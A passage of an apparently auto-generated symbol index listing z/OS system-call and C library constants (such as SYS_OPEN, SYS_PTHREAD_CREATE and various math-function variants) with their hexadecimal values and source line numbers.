SYS___LLROUNDL_B = 0xA94 constant SYS___LLROUNDL_H (line 606) | SYS___LLROUNDL_H = 0xA95 constant SYS___LLROUND_B (line 607) | SYS___LLROUND_B = 0xA8E constant SYS___LLROUND_H (line 608) | SYS___LLROUND_H = 0xA8F constant SYS___LOCALE_CTL (line 609) | SYS___LOCALE_CTL = 0xD47 constant SYS___LOG1PF_H (line 610) | SYS___LOG1PF_H = 0xA60 constant SYS___LOG1PL_H (line 611) | SYS___LOG1PL_H = 0xA61 constant SYS___LOGBF_B (line 612) | SYS___LOGBF_B = 0xA97 constant SYS___LOGBF_H (line 613) | SYS___LOGBF_H = 0xA98 constant SYS___LOGBL_B (line 614) | SYS___LOGBL_B = 0xA9A constant SYS___LOGBL_H (line 615) | SYS___LOGBL_H = 0xA9B constant SYS___LOGIN_APPLID (line 616) | SYS___LOGIN_APPLID = 0xCE2 constant SYS___LRINTF_B (line 617) | SYS___LRINTF_B = 0xAA0 constant SYS___LRINTF_H (line 618) | SYS___LRINTF_H = 0xAA1 constant SYS___LRINTL_B (line 619) | SYS___LRINTL_B = 0xAA3 constant SYS___LRINTL_H (line 620) | SYS___LRINTL_H = 0xAA4 constant SYS___LRINT_B (line 621) | SYS___LRINT_B = 0xA9D constant SYS___LRINT_H (line 622) | SYS___LRINT_H = 0xA9E constant SYS___LROUNDF_FIXUP (line 623) | SYS___LROUNDF_FIXUP = 0xB31 constant SYS___LROUNDL_B (line 624) | SYS___LROUNDL_B = 0xAA6 constant SYS___LROUNDL_H (line 625) | SYS___LROUNDL_H = 0xAA7 constant SYS___LROUND_FIXUP (line 626) | SYS___LROUND_FIXUP = 0xB30 constant SYS___MOSERVICES (line 627) | SYS___MOSERVICES = 0xD3D constant SYS___MUST_STAY_CLEAN (line 628) | SYS___MUST_STAY_CLEAN = 0xB7C constant SYS___NANF_B (line 629) | SYS___NANF_B = 0xAAB constant SYS___NANL_B (line 630) | SYS___NANL_B = 0xAAD constant SYS___NAN_B (line 631) | SYS___NAN_B = 0xAA9 constant SYS___NEARBYINTF_B (line 632) | SYS___NEARBYINTF_B = 0xAB2 constant SYS___NEARBYINTF_H (line 633) | SYS___NEARBYINTF_H = 0xAB3 constant SYS___NEARBYINTL_B (line 634) | SYS___NEARBYINTL_B = 0xAB5 constant SYS___NEARBYINTL_H (line 635) | SYS___NEARBYINTL_H = 0xAB6 constant SYS___NEARBYINT_B (line 636) | SYS___NEARBYINT_B = 0xAAF constant SYS___NEARBYINT_H (line 637) | SYS___NEARBYINT_H = 0xAB0 constant SYS___NEXTAFTERF_B (line 638) | SYS___NEXTAFTERF_B = 0xAB8 constant SYS___NEXTAFTERF_H (line 639) | SYS___NEXTAFTERF_H = 0xAB9 constant SYS___NEXTAFTERL_B (line 640) | SYS___NEXTAFTERL_B = 0xABB constant SYS___NEXTAFTERL_H (line 641) | SYS___NEXTAFTERL_H = 0xABC constant SYS___NEXTTOWARDF_B (line 642) | SYS___NEXTTOWARDF_B = 0xAC1 constant SYS___NEXTTOWARDF_H (line 643) | SYS___NEXTTOWARDF_H = 0xAC2 constant SYS___NEXTTOWARDL_B (line 644) | SYS___NEXTTOWARDL_B = 0xAC4 constant SYS___NEXTTOWARDL_H (line 645) | SYS___NEXTTOWARDL_H = 0xAC5 constant SYS___NEXTTOWARD_B (line 646) | SYS___NEXTTOWARD_B = 0xABE constant SYS___NEXTTOWARD_H (line 647) | SYS___NEXTTOWARD_H = 0xABF constant SYS___O_ENV (line 648) | SYS___O_ENV = 0xB7D constant SYS___PASSWD_APPLID (line 649) | SYS___PASSWD_APPLID = 0xCE3 constant SYS___PTOD1 (line 650) | SYS___PTOD1 = 0xC9E constant SYS___PTOD2 (line 651) | SYS___PTOD2 = 0xC9F constant SYS___PTOD4 (line 652) | SYS___PTOD4 = 0xCA0 constant SYS___REGCOMP_STD (line 653) | SYS___REGCOMP_STD = 0x0EA constant SYS___REMAINDERF_H (line 654) | SYS___REMAINDERF_H = 0xAC6 constant SYS___REMAINDERL_H (line 655) | SYS___REMAINDERL_H = 0xAC7 constant SYS___REMQUOD128 (line 656) | SYS___REMQUOD128 = 0xC10 constant SYS___REMQUOD32 (line 657) | SYS___REMQUOD32 = 0xC0E constant SYS___REMQUOD64 (line 658) | SYS___REMQUOD64 = 0xC0F constant SYS___REMQUOF_H (line 659) | SYS___REMQUOF_H = 0xAC9 constant SYS___REMQUOL_H (line 660) | SYS___REMQUOL_H = 0xACA constant SYS___REMQUO_H (line 661) | SYS___REMQUO_H = 0xAC8 constant SYS___RINTF_B (line 662) | SYS___RINTF_B = 0xACC constant SYS___RINTL_B (line 663) | SYS___RINTL_B = 0xACE constant SYS___ROUNDF_B (line 664) | SYS___ROUNDF_B = 0xAD3 constant SYS___ROUNDF_H (line 665) | SYS___ROUNDF_H = 0xAD4 constant SYS___ROUNDL_B (line 666) | SYS___ROUNDL_B = 0xAD6 constant SYS___ROUNDL_H (line 667) | SYS___ROUNDL_H = 0xAD7 constant SYS___ROUND_B (line 668) | SYS___ROUND_B = 0xAD0 constant SYS___ROUND_H (line 669) | SYS___ROUND_H = 0xAD1 constant SYS___SCALBLNF_B (line 670) | SYS___SCALBLNF_B = 0xADC constant SYS___SCALBLNF_H (line 671) | SYS___SCALBLNF_H = 0xADD constant SYS___SCALBLNL_B (line 672) | SYS___SCALBLNL_B = 0xADF constant SYS___SCALBLNL_H (line 673) | SYS___SCALBLNL_H = 0xAE0 constant SYS___SCALBLN_B (line 674) | SYS___SCALBLN_B = 0xAD9 constant SYS___SCALBLN_H (line 675) | SYS___SCALBLN_H = 0xADA constant SYS___SCALBNF_B (line 676) | SYS___SCALBNF_B = 0xAE4 constant SYS___SCALBNF_H (line 677) | SYS___SCALBNF_H = 0xAE5 constant SYS___SCALBNL_B (line 678) | SYS___SCALBNL_B = 0xAE7 constant SYS___SCALBNL_H (line 679) | SYS___SCALBNL_H = 0xAE8 constant SYS___SCALBN_B (line 680) | SYS___SCALBN_B = 0xAE1 constant SYS___SCALBN_H (line 681) | SYS___SCALBN_H = 0xAE2 constant SYS___SETENV (line 682) | SYS___SETENV = 0x0C8 constant SYS___SINPID128 (line 683) | SYS___SINPID128 = 0xC73 constant SYS___SINPID32 (line 684) | SYS___SINPID32 = 0xC71 constant SYS___SINPID64 (line 685) | SYS___SINPID64 = 0xC72 constant SYS___SMF_RECORD2 (line 686) | SYS___SMF_RECORD2 = 0xD48 constant SYS___STATIC_REINIT (line 687) | SYS___STATIC_REINIT = 0xB3D constant SYS___TGAMMAF_H_C99 (line 688) | SYS___TGAMMAF_H_C99 = 0xB79 constant SYS___TGAMMAL_H (line 689) | SYS___TGAMMAL_H = 0xAE9 constant SYS___TGAMMA_H_C99 (line 690) | SYS___TGAMMA_H_C99 = 0xB78 constant SYS___TOCSNAME2 (line 691) | SYS___TOCSNAME2 = 0xC9A constant SYS_CEIL (line 692) | SYS_CEIL = 0x01F constant SYS_CHAUDIT (line 693) | SYS_CHAUDIT = 0x1E0 constant SYS_EXP (line 694) | SYS_EXP = 0x01A constant SYS_FCHAUDIT (line 695) | SYS_FCHAUDIT = 0x1E1 constant SYS_FREXP (line 696) | SYS_FREXP = 0x01D constant SYS_GETGROUPSBYNAME (line 697) | SYS_GETGROUPSBYNAME = 0x1E2 constant SYS_GETPWUID (line 698) | SYS_GETPWUID = 0x1A0 constant SYS_GETUID (line 699) | SYS_GETUID = 0x1A1 constant SYS_ISATTY (line 700) | SYS_ISATTY = 0x1A3 constant SYS_KILL (line 701) | SYS_KILL = 0x1A4 constant SYS_LDEXP (line 702) | SYS_LDEXP = 0x01E constant SYS_LINK (line 703) | SYS_LINK = 0x1A5 constant SYS_LOG10 (line 704) | SYS_LOG10 = 0x01C constant SYS_LSEEK (line 705) | SYS_LSEEK = 0x1A6 constant SYS_LSTAT (line 706) | SYS_LSTAT = 0x1A7 constant SYS_MKDIR (line 707) | SYS_MKDIR = 0x1A8 constant SYS_MKFIFO (line 708) | SYS_MKFIFO = 0x1A9 constant SYS_MKNOD (line 709) | SYS_MKNOD = 0x1AA constant SYS_MODF (line 710) | SYS_MODF = 0x01B constant SYS_MOUNT (line 711) | SYS_MOUNT = 0x1AB constant SYS_OPEN (line 712) | SYS_OPEN = 0x1AC constant SYS_OPENDIR (line 713) | SYS_OPENDIR = 0x1AD constant SYS_PATHCONF (line 714) | SYS_PATHCONF = 0x1AE constant SYS_PAUSE (line 715) | SYS_PAUSE = 0x1AF constant SYS_PIPE (line 716) | SYS_PIPE = 0x1B0 constant SYS_PTHREAD_ATTR_DESTROY (line 717) | SYS_PTHREAD_ATTR_DESTROY = 0x1E7 constant SYS_PTHREAD_ATTR_GETDETACHSTATE (line 718) | SYS_PTHREAD_ATTR_GETDETACHSTATE = 0x1EB constant SYS_PTHREAD_ATTR_GETSTACKSIZE (line 719) | SYS_PTHREAD_ATTR_GETSTACKSIZE = 0x1E9 constant SYS_PTHREAD_ATTR_GETWEIGHT_NP (line 720) | SYS_PTHREAD_ATTR_GETWEIGHT_NP = 0x1ED constant SYS_PTHREAD_ATTR_INIT (line 721) | SYS_PTHREAD_ATTR_INIT = 0x1E6 constant SYS_PTHREAD_ATTR_SETDETACHSTATE (line 722) | SYS_PTHREAD_ATTR_SETDETACHSTATE = 0x1EA constant SYS_PTHREAD_ATTR_SETSTACKSIZE (line 723) | SYS_PTHREAD_ATTR_SETSTACKSIZE = 0x1E8 constant SYS_PTHREAD_ATTR_SETWEIGHT_NP (line 724) | SYS_PTHREAD_ATTR_SETWEIGHT_NP = 0x1EC constant SYS_PTHREAD_CANCEL (line 725) | SYS_PTHREAD_CANCEL = 0x1EE constant SYS_PTHREAD_CLEANUP_POP (line 726) | SYS_PTHREAD_CLEANUP_POP = 0x1F0 constant SYS_PTHREAD_CLEANUP_PUSH (line 727) | SYS_PTHREAD_CLEANUP_PUSH = 0x1EF constant SYS_PTHREAD_CONDATTR_DESTROY (line 728) | SYS_PTHREAD_CONDATTR_DESTROY = 0x1F2 constant SYS_PTHREAD_CONDATTR_INIT (line 729) | SYS_PTHREAD_CONDATTR_INIT = 0x1F1 constant SYS_PTHREAD_COND_BROADCAST (line 730) | SYS_PTHREAD_COND_BROADCAST = 0x1F6 constant SYS_PTHREAD_COND_DESTROY (line 731) | SYS_PTHREAD_COND_DESTROY = 0x1F4 constant SYS_PTHREAD_COND_INIT (line 732) | SYS_PTHREAD_COND_INIT = 0x1F3 constant SYS_PTHREAD_COND_SIGNAL (line 733) | SYS_PTHREAD_COND_SIGNAL = 0x1F5 constant SYS_PTHREAD_COND_TIMEDWAIT (line 734) | SYS_PTHREAD_COND_TIMEDWAIT = 0x1F8 constant SYS_PTHREAD_COND_WAIT (line 735) | SYS_PTHREAD_COND_WAIT = 0x1F7 constant SYS_PTHREAD_CREATE (line 736) | SYS_PTHREAD_CREATE = 0x1F9 constant SYS_PTHREAD_DETACH (line 737) | SYS_PTHREAD_DETACH = 0x1FA constant SYS_PTHREAD_EQUAL (line 738) | SYS_PTHREAD_EQUAL = 0x1FB constant SYS_PTHREAD_EXIT (line 739) | SYS_PTHREAD_EXIT = 0x1E4 constant SYS_PTHREAD_GETSPECIFIC (line 740) | SYS_PTHREAD_GETSPECIFIC = 0x1FC constant SYS_PTHREAD_JOIN (line 741) | SYS_PTHREAD_JOIN = 0x1FD constant SYS_PTHREAD_KEY_CREATE (line 742) | SYS_PTHREAD_KEY_CREATE = 0x1FE constant SYS_PTHREAD_KILL (line 743) | SYS_PTHREAD_KILL = 0x1E5 constant SYS_PTHREAD_MUTEXATTR_INIT (line 744) | SYS_PTHREAD_MUTEXATTR_INIT = 0x1FF constant SYS_READ (line 745) | SYS_READ = 0x1B2 constant SYS_READDIR (line 746) | SYS_READDIR = 0x1B3 constant SYS_READLINK (line 747) | SYS_READLINK = 0x1B4 constant SYS_REWINDDIR (line 748) | SYS_REWINDDIR = 0x1B5 constant SYS_RMDIR (line 749) | SYS_RMDIR = 0x1B6 constant SYS_SETEGID (line 750) | SYS_SETEGID = 0x1B7 constant SYS_SETEUID (line 751) | SYS_SETEUID = 0x1B8 constant SYS_SETGID (line 752) | SYS_SETGID = 0x1B9 constant SYS_SETPGID (line 753) | SYS_SETPGID = 0x1BA constant SYS_SETSID (line 754) | SYS_SETSID = 0x1BB constant SYS_SETUID (line 755) | SYS_SETUID = 0x1BC constant SYS_SIGACTION (line 756) | SYS_SIGACTION = 0x1BD constant SYS_SIGADDSET (line 757) | SYS_SIGADDSET = 0x1BE constant SYS_SIGDELSET (line 758) | SYS_SIGDELSET = 0x1BF constant SYS_SIGEMPTYSET (line 759) | SYS_SIGEMPTYSET = 0x1C0 constant SYS_SIGFILLSET (line 760) | SYS_SIGFILLSET = 0x1C1 constant SYS_SIGISMEMBER (line 761) | SYS_SIGISMEMBER = 0x1C2 constant SYS_SIGLONGJMP (line 762) | SYS_SIGLONGJMP = 0x1C3 constant SYS_SIGPENDING (line 763) | SYS_SIGPENDING = 0x1C4 constant SYS_SIGPROCMASK (line 764) | SYS_SIGPROCMASK = 0x1C5 constant SYS_SIGSETJMP (line 765) | SYS_SIGSETJMP = 0x1C6 constant SYS_SIGSUSPEND (line 766) | SYS_SIGSUSPEND = 0x1C7 constant SYS_SIGWAIT (line 767) | SYS_SIGWAIT = 0x1E3 constant SYS_SLEEP (line 768) | SYS_SLEEP = 0x1C8 constant SYS_STAT (line 769) | SYS_STAT = 0x1C9 constant SYS_SYMLINK (line 770) | SYS_SYMLINK = 0x1CB constant SYS_SYSCONF (line 771) | SYS_SYSCONF = 0x1CC constant SYS_TCDRAIN (line 772) | SYS_TCDRAIN = 0x1CD constant SYS_TCFLOW (line 773) | SYS_TCFLOW = 0x1CE constant SYS_TCFLUSH (line 774) | SYS_TCFLUSH = 0x1CF constant SYS_TCGETATTR (line 775) | SYS_TCGETATTR = 0x1D0 constant SYS_TCGETPGRP (line 776) | SYS_TCGETPGRP = 0x1D1 constant SYS_TCSENDBREAK (line 777) | SYS_TCSENDBREAK = 0x1D2 constant SYS_TCSETATTR (line 778) | SYS_TCSETATTR = 0x1D3 constant SYS_TCSETPGRP (line 779) | SYS_TCSETPGRP = 0x1D4 constant SYS_TIMES (line 780) | SYS_TIMES = 0x1D5 constant SYS_TTYNAME (line 781) | SYS_TTYNAME = 0x1D6 constant SYS_TZSET (line 782) | SYS_TZSET = 0x1D7 constant SYS_UMASK (line 783) | SYS_UMASK = 0x1D8 constant SYS_UMOUNT (line 784) | SYS_UMOUNT = 0x1D9 constant SYS_UNAME (line 785) | SYS_UNAME = 0x1DA constant SYS_UNLINK (line 786) | SYS_UNLINK = 0x1DB constant SYS_UTIME (line 787) | SYS_UTIME = 0x1DC constant SYS_WAIT (line 788) | SYS_WAIT = 0x1DD constant SYS_WAITPID (line 789) | SYS_WAITPID = 0x1DE constant SYS_WRITE (line 790) | SYS_WRITE = 0x1DF constant SYS_W_GETPSENT (line 791) | SYS_W_GETPSENT = 0x1B1 constant SYS_W_IOCTL (line 792) | SYS_W_IOCTL = 0x1A2 constant SYS_W_STATFS (line 793) | SYS_W_STATFS = 0x1CA constant SYS_A64L (line 794) | SYS_A64L = 0x2EF constant SYS_BCMP (line 795) | SYS_BCMP = 0x2B9 constant SYS_BCOPY (line 796) | SYS_BCOPY = 0x2BA constant SYS_BZERO (line 797) | SYS_BZERO = 0x2BB constant SYS_CATCLOSE (line 798) | SYS_CATCLOSE = 0x2B6 constant SYS_CATGETS (line 799) | SYS_CATGETS = 0x2B7 constant SYS_CATOPEN (line 800) | SYS_CATOPEN = 0x2B8 constant SYS_CRYPT (line 801) | SYS_CRYPT = 0x2AC constant SYS_DBM_CLEARERR (line 802) | SYS_DBM_CLEARERR = 0x2F7 constant SYS_DBM_CLOSE (line 803) | SYS_DBM_CLOSE = 0x2F8 constant SYS_DBM_DELETE (line 804) | SYS_DBM_DELETE = 0x2F9 constant SYS_DBM_ERROR (line 805) | SYS_DBM_ERROR = 0x2FA constant SYS_DBM_FETCH (line 806) | SYS_DBM_FETCH = 0x2FB constant SYS_DBM_FIRSTKEY (line 807) | SYS_DBM_FIRSTKEY = 0x2FC constant SYS_DBM_NEXTKEY (line 808) | SYS_DBM_NEXTKEY = 0x2FD constant SYS_DBM_OPEN (line 809) | SYS_DBM_OPEN = 0x2FE constant SYS_DBM_STORE (line 810) | SYS_DBM_STORE = 0x2FF constant SYS_DRAND48 (line 811) | SYS_DRAND48 = 0x2B2 constant SYS_ENCRYPT (line 812) | SYS_ENCRYPT = 0x2AD constant SYS_ENDUTXENT (line 813) | SYS_ENDUTXENT = 0x2E1 constant SYS_ERAND48 (line 814) | SYS_ERAND48 = 0x2B3 constant SYS_ERF (line 815) | SYS_ERF = 0x02C constant SYS_ERFC (line 816) | SYS_ERFC = 0x02D constant SYS_FCHDIR (line 817) | SYS_FCHDIR = 0x2D9 constant SYS_FFS (line 818) | SYS_FFS = 0x2BC constant SYS_FMTMSG (line 819) | SYS_FMTMSG = 0x2E5 constant SYS_FSTATVFS (line 820) | SYS_FSTATVFS = 0x2B4 constant SYS_FTIME (line 821) | SYS_FTIME = 0x2F5 constant SYS_GAMMA (line 822) | SYS_GAMMA = 0x02E constant SYS_GETDATE (line 823) | SYS_GETDATE = 0x2A6 constant SYS_GETPAGESIZE (line 824) | SYS_GETPAGESIZE = 0x2D8 constant SYS_GETTIMEOFDAY (line 825) | SYS_GETTIMEOFDAY = 0x2F6 constant SYS_GETUTXENT (line 826) | SYS_GETUTXENT = 0x2E0 constant SYS_GETUTXID (line 827) | SYS_GETUTXID = 0x2E2 constant SYS_GETUTXLINE (line 828) | SYS_GETUTXLINE = 0x2E3 constant SYS_HCREATE (line 829) | SYS_HCREATE = 0x2C6 constant SYS_HDESTROY (line 830) | SYS_HDESTROY = 0x2C7 constant SYS_HSEARCH (line 831) | SYS_HSEARCH = 0x2C8 constant SYS_HYPOT (line 832) | SYS_HYPOT = 0x02B constant SYS_INDEX (line 833) | SYS_INDEX = 0x2BD constant SYS_INITSTATE (line 834) | SYS_INITSTATE = 0x2C2 constant SYS_INSQUE (line 835) | SYS_INSQUE = 0x2CF constant SYS_ISASCII (line 836) | SYS_ISASCII = 0x2ED constant SYS_JRAND48 (line 837) | SYS_JRAND48 = 0x2E6 constant SYS_L64A (line 838) | SYS_L64A = 0x2F0 constant SYS_LCONG48 (line 839) | SYS_LCONG48 = 0x2EA constant SYS_LFIND (line 840) | SYS_LFIND = 0x2C9 constant SYS_LRAND48 (line 841) | SYS_LRAND48 = 0x2E7 constant SYS_LSEARCH (line 842) | SYS_LSEARCH = 0x2CA constant SYS_MEMCCPY (line 843) | SYS_MEMCCPY = 0x2D4 constant SYS_MRAND48 (line 844) | SYS_MRAND48 = 0x2E8 constant SYS_NRAND48 (line 845) | SYS_NRAND48 = 0x2E9 constant SYS_PCLOSE (line 846) | SYS_PCLOSE = 0x2D2 constant SYS_POPEN (line 847) | SYS_POPEN = 0x2D1 constant SYS_PUTUTXLINE (line 848) | SYS_PUTUTXLINE = 0x2E4 constant SYS_RANDOM (line 849) | SYS_RANDOM = 0x2C4 constant SYS_REMQUE (line 850) | SYS_REMQUE = 0x2D0 constant SYS_RINDEX (line 851) | SYS_RINDEX = 0x2BE constant SYS_SEED48 (line 852) | SYS_SEED48 = 0x2EC constant SYS_SETKEY (line 853) | SYS_SETKEY = 0x2AE constant SYS_SETSTATE (line 854) | SYS_SETSTATE = 0x2C3 constant SYS_SETUTXENT (line 855) | SYS_SETUTXENT = 0x2DF constant SYS_SRAND48 (line 856) | SYS_SRAND48 = 0x2EB constant SYS_SRANDOM (line 857) | SYS_SRANDOM = 0x2C5 constant SYS_STATVFS (line 858) | SYS_STATVFS = 0x2B5 constant SYS_STRCASECMP (line 859) | SYS_STRCASECMP = 0x2BF constant SYS_STRDUP (line 860) | SYS_STRDUP = 0x2C0 constant SYS_STRNCASECMP (line 861) | SYS_STRNCASECMP = 0x2C1 constant SYS_SWAB (line 862) | SYS_SWAB = 0x2D3 constant SYS_TDELETE (line 863) | SYS_TDELETE = 0x2CB constant SYS_TFIND (line 864) | SYS_TFIND = 0x2CC constant SYS_TOASCII (line 865) | SYS_TOASCII = 0x2EE constant SYS_TSEARCH (line 866) | SYS_TSEARCH = 0x2CD constant SYS_TWALK (line 867) | SYS_TWALK = 0x2CE constant SYS_UALARM (line 868) | SYS_UALARM = 0x2F1 constant SYS_USLEEP (line 869) | SYS_USLEEP = 0x2F2 constant SYS_WAIT3 (line 870) | SYS_WAIT3 = 0x2A7 constant SYS_WAITID (line 871) | SYS_WAITID = 0x2A8 constant SYS_Y1 (line 872) | SYS_Y1 = 0x02A constant SYS___ATOE (line 873) | SYS___ATOE = 0x2DB constant SYS___ATOE_L (line 874) | SYS___ATOE_L = 0x2DC constant SYS___CATTRM (line 875) | SYS___CATTRM = 0x2A9 constant SYS___CNVBLK (line 876) | SYS___CNVBLK = 0x2AF constant SYS___CRYTRM (line 877) | SYS___CRYTRM = 0x2B0 constant SYS___DLGHT (line 878) | SYS___DLGHT = 0x2A1 constant SYS___ECRTRM (line 879) | SYS___ECRTRM = 0x2B1 constant SYS___ETOA (line 880) | SYS___ETOA = 0x2DD constant SYS___ETOA_L (line 881) | SYS___ETOA_L = 0x2DE constant SYS___GDTRM (line 882) | SYS___GDTRM = 0x2AA constant SYS___OCLCK (line 883) | SYS___OCLCK = 0x2DA constant SYS___OPARGF (line 884) | SYS___OPARGF = 0x2A2 constant SYS___OPERRF (line 885) | SYS___OPERRF = 0x2A5 constant SYS___OPINDF (line 886) | SYS___OPINDF = 0x2A4 constant SYS___OPOPTF (line 887) | SYS___OPOPTF = 0x2A3 constant SYS___RNDTRM (line 888) | SYS___RNDTRM = 0x2AB constant SYS___SRCTRM (line 889) | SYS___SRCTRM = 0x2F4 constant SYS___TZONE (line 890) | SYS___TZONE = 0x2A0 constant SYS___UTXTRM (line 891) | SYS___UTXTRM = 0x2F3 constant SYS_ASIN (line 892) | SYS_ASIN = 0x03E constant SYS_ISXDIGIT (line 893) | SYS_ISXDIGIT = 0x03B constant SYS_SETLOCAL (line 894) | SYS_SETLOCAL = 0x03A constant SYS_SETLOCALE (line 895) | SYS_SETLOCALE = 0x03A constant SYS_SIN (line 896) | SYS_SIN = 0x03F constant SYS_TOLOWER (line 897) | SYS_TOLOWER = 0x03C constant SYS_TOUPPER (line 898) | SYS_TOUPPER = 0x03D constant SYS_ACCEPT_AND_RECV (line 899) | SYS_ACCEPT_AND_RECV = 0x4F7 constant SYS_ATOL (line 900) | SYS_ATOL = 0x04E constant SYS_CHECKSCH (line 901) | SYS_CHECKSCH = 0x4BC constant SYS_CHECKSCHENV (line 902) | SYS_CHECKSCHENV = 0x4BC constant SYS_CLEARERR (line 903) | SYS_CLEARERR = 0x04C constant SYS_CONNECTS (line 904) | SYS_CONNECTS = 0x4B5 constant SYS_CONNECTSERVER (line 905) | SYS_CONNECTSERVER = 0x4B5 constant SYS_CONNECTW (line 906) | SYS_CONNECTW = 0x4B4 constant SYS_CONNECTWORKMGR (line 907) | SYS_CONNECTWORKMGR = 0x4B4 constant SYS_CONTINUE (line 908) | SYS_CONTINUE = 0x4B3 constant SYS_CONTINUEWORKUNIT (line 909) | SYS_CONTINUEWORKUNIT = 0x4B3 constant SYS_COPYSIGN (line 910) | SYS_COPYSIGN = 0x4C2 constant SYS_CREATEWO (line 911) | SYS_CREATEWO = 0x4B2 constant SYS_CREATEWORKUNIT (line 912) | SYS_CREATEWORKUNIT = 0x4B2 constant SYS_DELETEWO (line 913) | SYS_DELETEWO = 0x4B9 constant SYS_DELETEWORKUNIT (line 914) | SYS_DELETEWORKUNIT = 0x4B9 constant SYS_DISCONNE (line 915) | SYS_DISCONNE = 0x4B6 constant SYS_DISCONNECTSERVER (line 916) | SYS_DISCONNECTSERVER = 0x4B6 constant SYS_FEOF (line 917) | SYS_FEOF = 0x04D constant SYS_FERROR (line 918) | SYS_FERROR = 0x04A constant SYS_FINITE (line 919) | SYS_FINITE = 0x4C8 constant SYS_GAMMA_R (line 920) | SYS_GAMMA_R = 0x4E2 constant SYS_JOINWORK (line 921) | SYS_JOINWORK = 0x4B7 constant SYS_JOINWORKUNIT (line 922) | SYS_JOINWORKUNIT = 0x4B7 constant SYS_LEAVEWOR (line 923) | SYS_LEAVEWOR = 0x4B8 constant SYS_LEAVEWORKUNIT (line 924) | SYS_LEAVEWORKUNIT = 0x4B8 constant SYS_LGAMMA_R (line 925) | SYS_LGAMMA_R = 0x4EB constant SYS_MATHERR (line 926) | SYS_MATHERR = 0x4D0 constant SYS_PERROR (line 927) | SYS_PERROR = 0x04F constant SYS_QUERYMET (line 928) | SYS_QUERYMET = 0x4BA constant SYS_QUERYMETRICS (line 929) | SYS_QUERYMETRICS = 0x4BA constant SYS_QUERYSCH (line 930) | SYS_QUERYSCH = 0x4BB constant SYS_QUERYSCHENV (line 931) | SYS_QUERYSCHENV = 0x4BB constant SYS_REWIND (line 932) | SYS_REWIND = 0x04B constant SYS_SCALBN (line 933) | SYS_SCALBN = 0x4D4 constant SYS_SIGNIFIC (line 934) | SYS_SIGNIFIC = 0x4D5 constant SYS_SIGNIFICAND (line 935) | SYS_SIGNIFICAND = 0x4D5 constant SYS___ACOSH_B (line 936) | SYS___ACOSH_B = 0x4DA constant SYS___ACOS_B (line 937) | SYS___ACOS_B = 0x4D9 constant SYS___ASINH_B (line 938) | SYS___ASINH_B = 0x4BE constant SYS___ASIN_B (line 939) | SYS___ASIN_B = 0x4DB constant SYS___ATAN2_B (line 940) | SYS___ATAN2_B = 0x4DC constant SYS___ATANH_B (line 941) | SYS___ATANH_B = 0x4DD constant SYS___ATAN_B (line 942) | SYS___ATAN_B = 0x4BF constant SYS___CBRT_B (line 943) | SYS___CBRT_B = 0x4C0 constant SYS___CEIL_B (line 944) | SYS___CEIL_B = 0x4C1 constant SYS___COSH_B (line 945) | SYS___COSH_B = 0x4DE constant SYS___COS_B (line 946) | SYS___COS_B = 0x4C3 constant SYS___DGHT (line 947) | SYS___DGHT = 0x4A8 constant SYS___ENVN (line 948) | SYS___ENVN = 0x4B0 constant SYS___ERFC_B (line 949) | SYS___ERFC_B = 0x4C5 constant SYS___ERF_B (line 950) | SYS___ERF_B = 0x4C4 constant SYS___EXPM1_B (line 951) | SYS___EXPM1_B = 0x4C6 constant SYS___EXP_B (line 952) | SYS___EXP_B = 0x4DF constant SYS___FABS_B (line 953) | SYS___FABS_B = 0x4C7 constant SYS___FLOOR_B (line 954) | SYS___FLOOR_B = 0x4C9 constant SYS___FMOD_B (line 955) | SYS___FMOD_B = 0x4E0 constant SYS___FP_SETMODE (line 956) | SYS___FP_SETMODE = 0x4F8 constant SYS___FREXP_B (line 957) | SYS___FREXP_B = 0x4CA constant SYS___GAMMA_B (line 958) | SYS___GAMMA_B = 0x4E1 constant SYS___GDRR (line 959) | SYS___GDRR = 0x4A1 constant SYS___HRRNO (line 960) | SYS___HRRNO = 0x4A2 constant SYS___HYPOT_B (line 961) | SYS___HYPOT_B = 0x4E3 constant SYS___ILOGB_B (line 962) | SYS___ILOGB_B = 0x4CB constant SYS___ISNAN_B (line 963) | SYS___ISNAN_B = 0x4CC constant SYS___J0_B (line 964) | SYS___J0_B = 0x4E4 constant SYS___J1_B (line 965) | SYS___J1_B = 0x4E6 constant SYS___JN_B (line 966) | SYS___JN_B = 0x4E8 constant SYS___LDEXP_B (line 967) | SYS___LDEXP_B = 0x4CD constant SYS___LGAMMA_B (line 968) | SYS___LGAMMA_B = 0x4EA constant SYS___LOG10_B (line 969) | SYS___LOG10_B = 0x4ED constant SYS___LOG1P_B (line 970) | SYS___LOG1P_B = 0x4CE constant SYS___LOGB_B (line 971) | SYS___LOGB_B = 0x4CF constant SYS___LOGIN (line 972) | SYS___LOGIN = 0x4F5 constant SYS___LOG_B (line 973) | SYS___LOG_B = 0x4EC constant SYS___MLOCKALL (line 974) | SYS___MLOCKALL = 0x4B1 constant SYS___MODF_B (line 975) | SYS___MODF_B = 0x4D1 constant SYS___NEXTAFTER_B (line 976) | SYS___NEXTAFTER_B = 0x4D2 constant SYS___OPENDIR2 (line 977) | SYS___OPENDIR2 = 0x4F3 constant SYS___OPEN_STAT (line 978) | SYS___OPEN_STAT = 0x4F6 constant SYS___OPND (line 979) | SYS___OPND = 0x4A5 constant SYS___OPPT (line 980) | SYS___OPPT = 0x4A6 constant SYS___OPRG (line 981) | SYS___OPRG = 0x4A3 constant SYS___OPRR (line 982) | SYS___OPRR = 0x4A4 constant SYS___PID_AFFINITY (line 983) | SYS___PID_AFFINITY = 0x4BD constant SYS___POW_B (line 984) | SYS___POW_B = 0x4EE constant SYS___READDIR2 (line 985) | SYS___READDIR2 = 0x4F4 constant SYS___REMAINDER_B (line 986) | SYS___REMAINDER_B = 0x4EF constant SYS___RINT_B (line 987) | SYS___RINT_B = 0x4D3 constant SYS___SCALB_B (line 988) | SYS___SCALB_B = 0x4F0 constant SYS___SIGACTIONSET (line 989) | SYS___SIGACTIONSET = 0x4FB constant SYS___SIGGM (line 990) | SYS___SIGGM = 0x4A7 constant SYS___SINH_B (line 991) | SYS___SINH_B = 0x4F1 constant SYS___SIN_B (line 992) | SYS___SIN_B = 0x4D6 constant SYS___SQRT_B (line 993) | SYS___SQRT_B = 0x4F2 constant SYS___TANH_B (line 994) | SYS___TANH_B = 0x4D8 constant SYS___TAN_B (line 995) | SYS___TAN_B = 0x4D7 constant SYS___TRRNO (line 996) | SYS___TRRNO = 0x4AF constant SYS___TZNE (line 997) | SYS___TZNE = 0x4A9 constant SYS___TZZN (line 998) | SYS___TZZN = 0x4AA constant SYS___UCREATE (line 999) | SYS___UCREATE = 0x4FC constant SYS___UFREE (line 1000) | 